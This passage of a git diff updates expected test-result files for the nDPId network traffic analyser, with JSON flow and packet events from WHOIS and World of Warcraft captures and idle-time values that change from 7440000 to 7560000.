sZWN0cm9uaWMgcHJvY2Vzc2VzDQp0aGF0IGFwcGx5IHRvIFZlcmlTaWduIChvciBpdHMgY29tcHV0ZXIgc3lzdGVtcykuIFRoZSBjb21waWxhdGlvbiwNCnJlcGFja2FnaW5nLA=="} -00926{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 
-00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623517268690,"flow_last_seen":1623517268690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623517268690,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623517268690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":62,"pkt_l4_len":24,"thread_ts_msec":1623517268690,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAALKUxAAAtBrE+wB4tHgqgP4AAK8\/hR0rdvNStq\/tgEgW05awAAAIEBVA="} 
+02064{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623517269021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"thread_ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2B35AAAtBjPLwB4tHgqgP4AAK8\/hR0rdvdStrBVQGAW0T9cAACAgIERvbWFpbiBOYW1lOiBDWUJFUlBBVFJPTEJELkNPTQ0KICAgUmVnaXN0cnkgRG9tYWluIElEOiAyMTUzNDAwMTAwX0RPTUFJTl9DT00tVlJTTg0KICAgUmVnaXN0cmFyIFdIT0lTIFNlcnZlcjogd2hvaXMuUHVibGljRG9tYWluUmVnaXN0cnkuY29tDQogICBSZWdpc3RyYXIgVVJMOiBodHRwOi8vd3d3LnB1YmxpY2RvbWFpbnJlZ2lzdHJ5LmNvbQ0KICAgVXBkYXRlZCBEYXRlOiAyMDIwLTA4LTI5VDA3OjQxOjUyWg0KICAgQ3JlYXRpb24gRGF0ZTogMjAxNy0wOC0xNFQxNjoxMDo1MVoNCiAgIFJlZ2lzdHJ5IEV4cGlyeSBEYXRlOiAyMDIxLTA4LTE0VDE2OjEwOjUxWg0KICAgUmVnaXN0cmFyOiBQRFIgTHRkLiBkL2IvYSBQdWJsaWNEb21haW5SZWdpc3RyeS5jb20NCiAgIFJlZ2lzdHJhciBJQU5BIElEOiAzMDMNCiAgIFJlZ2lzdHJhciBBYnVzZSBDb250YWN0IEVtYWlsOiBhYnVzZS1jb250YWN0QHB1YmxpY2RvbWFpbnJlZ2lzdHJ5LmNvbQ0KICAgUmVnaXN0cmFyIEFidXNlIENvbnRhY3QgUGhvbmU6ICsxLjIwMTM3NzU5NTINCiAgIERvbWFpbiBTdGF0dXM6IGNsaWVudFRyYW5zZmVyUHJvaGliaXRlZCBodHRwczovL2ljYW5uLm9yZy9lcHAjY2xpZW50VHJhbnNmZXJQcm9oaWJpdGVkDQogICBOYW1lIFNlcnZlcjogTlMyNS5FSUNSQS5ORVQNCiAgIE5hbWUgU2VydmVyOiBOUzI2LkVJQ1JBLk5FVA0KICAgRE5TU0VDOiB1bnNpZ25lZA0KICAgVVJMIG9mIHRoZSBJQ0FOTiBXaG9pcyBJbmFjY3VyYWN5IENvbXBsYWludCBGb3JtOiBodHRwczovL3d3dy5pY2Fubi5vcmcvd2ljZi8NCj4+PiBMYXN0IHVwZGF0ZSBvZiB3aG9pcyBkYXRhYmFzZTogMjAyMS0wNi0xMlQxNjowMDo1NlogPDw8DQoNCkZvciBtb3JlIGluZm9ybWF0aW9uIG9uIFdob2lzIHN0YXR1cyBjb2RlcywgcGxlYXNlIHZpc2l0IGh0dHBzOi8vaWNhbm4ub3JnL2VwcA0KDQpOT1RJQ0U6IFRoZSBleHBpcmF0aW9uIGRhdGUgZGlzcGxheWVkIGluIHRoaXMgcmVjb3JkIGlzIHRoZSBkYXRlIHRoZQ0KcmVnaXN0cmFyJ3Mgc3BvbnNvcnNoaXAgb2YgdGhlIGRvbWFpbiBuYW1lIHJlZ2lzdHJhdGlvbiBpbiB0aGUgcmVnaXN0cnkgaXMNCmN1cnJlbnRseSBzZXQgdG8gZXhwaXJlLiBUaGlzIGRhdGUgZG9lcyBub3QgbmVjZXNzYXJpbHkgcmVmbGVjdCB0aGUgZXhwa
XJhdGlvbg0KZGF0ZSBvZiB0aGUgZG9tYWluIG5hbWUgcmVnaXN0cmFudCdzIGFncg=="} +02064{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623517269021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"thread_ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2Mf8AAAtBonHwB4tHgqgP4AAK8\/hR0ribdStrBVQGAW06F4AAGVlbWVudCB3aXRoIHRoZSBzcG9uc29yaW5nDQpyZWdpc3RyYXIuICBVc2VycyBtYXkgY29uc3VsdCB0aGUgc3BvbnNvcmluZyByZWdpc3RyYXIncyBXaG9pcyBkYXRhYmFzZSB0bw0KdmlldyB0aGUgcmVnaXN0cmFyJ3MgcmVwb3J0ZWQgZGF0ZSBvZiBleHBpcmF0aW9uIGZvciB0aGlzIHJlZ2lzdHJhdGlvbi4NCg0KVEVSTVMgT0YgVVNFOiBZb3UgYXJlIG5vdCBhdXRob3JpemVkIHRvIGFjY2VzcyBvciBxdWVyeSBvdXIgV2hvaXMNCmRhdGFiYXNlIHRocm91Z2ggdGhlIHVzZSBvZiBlbGVjdHJvbmljIHByb2Nlc3NlcyB0aGF0IGFyZSBoaWdoLXZvbHVtZSBhbmQNCmF1dG9tYXRlZCBleGNlcHQgYXMgcmVhc29uYWJseSBuZWNlc3NhcnkgdG8gcmVnaXN0ZXIgZG9tYWluIG5hbWVzIG9yDQptb2RpZnkgZXhpc3RpbmcgcmVnaXN0cmF0aW9uczsgdGhlIERhdGEgaW4gVmVyaVNpZ24gR2xvYmFsIFJlZ2lzdHJ5DQpTZXJ2aWNlcycgKCJWZXJpU2lnbiIpIFdob2lzIGRhdGFiYXNlIGlzIHByb3ZpZGVkIGJ5IFZlcmlTaWduIGZvcg0KaW5mb3JtYXRpb24gcHVycG9zZXMgb25seSwgYW5kIHRvIGFzc2lzdCBwZXJzb25zIGluIG9idGFpbmluZyBpbmZvcm1hdGlvbg0KYWJvdXQgb3IgcmVsYXRlZCB0byBhIGRvbWFpbiBuYW1lIHJlZ2lzdHJhdGlvbiByZWNvcmQuIFZlcmlTaWduIGRvZXMgbm90DQpndWFyYW50ZWUgaXRzIGFjY3VyYWN5LiBCeSBzdWJtaXR0aW5nIGEgV2hvaXMgcXVlcnksIHlvdSBhZ3JlZSB0byBhYmlkZQ0KYnkgdGhlIGZvbGxvd2luZyB0ZXJtcyBvZiB1c2U6IFlvdSBhZ3JlZSB0aGF0IHlvdSBtYXkgdXNlIHRoaXMgRGF0YSBvbmx5DQpmb3IgbGF3ZnVsIHB1cnBvc2VzIGFuZCB0aGF0IHVuZGVyIG5vIGNpcmN1bXN0YW5jZXMgd2lsbCB5b3UgdXNlIHRoaXMgRGF0YQ0KdG86ICgxKSBhbGxvdywgZW5hYmxlLCBvciBvdGhlcndpc2Ugc3VwcG9ydCB0aGUgdHJhbnNtaXNzaW9uIG9mIG1hc3MNCnVuc29saWNpdGVkLCBjb21tZXJjaWFsIGFkdmVydGlzaW5nIG9yIHNvbGljaXRhdGlvbnMgdmlhIGUtbWFpbCwgdGVsZXBob25lLA0Kb3IgZmFjc2ltaWxlOyBvciAoMikgZW5hYmxlIGhpZ2ggdm9sdW1lLCBhdXRvbWF0ZWQsIGV
sZWN0cm9uaWMgcHJvY2Vzc2VzDQp0aGF0IGFwcGx5IHRvIFZlcmlTaWduIChvciBpdHMgY29tcHV0ZXIgc3lzdGVtcykuIFRoZSBjb21waWxhdGlvbiwNCnJlcGFja2FnaW5nLA=="} +00926{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 
+00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":23,"packets-processed":23,"total-skipped-flows":0,"total-l4-data-len":4920,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1623517269021} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 23/23 diff --git a/test/results/wow.pcap.out b/test/results/wow.pcap.out index 8a53bafaa..b8723370d 100644 --- a/test/results/wow.pcap.out +++ b/test/results/wow.pcap.out 
@@ -1,36 +1,36 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"wow.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"wow.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1437858769436} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858769436,"flow_last_seen":1437858769436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858769436,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437858769436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769436,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJNAAIAGhLXAqLIUDIHeNZmNAFBo+hN9AAAAAKACIADawAAAAgQFtAEDAwIEAggKACnZUgAAAAA="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437858769437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769437,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJNAAIAGhLXAqLIUDIHeNZmNAFBo+hN9AAAAAKACIADawAAAAgQFtAEDAwIEAggKACnZUgAAAAA="} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858769451,"flow_last_seen":1437858769451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858769451,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1437858769451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769451,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJRAAIAGOe3AqLIUGGkdFZmQAFAEh98cAAAAAKACIAAoyAAAAgQFtAEDAwIEAggKACnZVAAAAAA="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1437858769452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769452,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJRAAIAGOe3AqLIUGGkdFZmQAFAEh98cAAAAAKACIAAoyAAAAgQFtAEDAwIEAggKACnZVAAAAAA="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437858769649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769649,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG6kgMgd41wKiyFABQmY301K7baPoTfqASFqCzawAAAgQFhAQCCAqn1+VGACnZUgEDAwc="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769436,"flow_last_seen":1437858769651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1437858769651,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1437858769673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1437858769673,"pkt":"JGURQGHhJGUR0Ik6CABFAAAwGJRAAHEGSPkYaR0VwKiyFABQmZCXtfydBIffHXASIACqLAAAAgQFhAQCAAA="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769451,"flow_last_seen":1437858769820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1437858769820,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"launcher.worldofwarcraft.com","url":"launcher.worldofwarcraft.com\/alert","code":0,"content_type":"","user_agent":""}} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858780584,"flow_last_seen":1437858780584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858780584,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437858780584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780584,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GOFAAIAGfgPAqLIUDIHkmZmhDoyszXMNAAAAAKACIAAeTgAAAgQFtAEDAwIEAggKACndrQAAAAA="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1437858780584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780584,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GOFAAIAGfgPAqLIUDIHkmZmhDoyszXMNAAAAAKACIAAeTgAAAgQFtAEDAwIEAggKACndrQAAAAA="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1437858780796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780796,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+QMgeSZwKiyFA6MmaEZw7OGrM1zDqASOJCV8gAAAgQFhAQCCApCuV\/iACndrQEDAwc="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858780584,"flow_last_seen":1437858781018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858781018,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858849489,"flow_last_seen":1437858849489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858849489,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1437858849489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849489,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GWRAAIAGfYDAqLIUDIHkmZnEDowRX7J7AAAAAKACIABfQAAAAgQFtAEDAwIEAggKACn4mAAAAAA="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1437858849489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849489,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GWRAAIAGfYDAqLIUDIHkmZnEDowRX7J7AAAAAKACIABfQAAAAgQFtAEDAwIEAggKACn4mAAAAAA="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1437858849702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849702,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+QMgeSZwKiyFA6MmcRkqiOyEV+yfKASOJAOpgAAAgQFhAQCCApCum0NACn4mAEDAwc="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858849489,"flow_last_seen":1437858849924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858849924,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858769436,"flow_last_seen":1437858769436,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858769436,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437858769436,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769436,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJNAAIAGhLXAqLIUDIHeNZmNAFBo+hN9AAAAAKACIADawAAAAgQFtAEDAwIEAggKACnZUgAAAAA="} 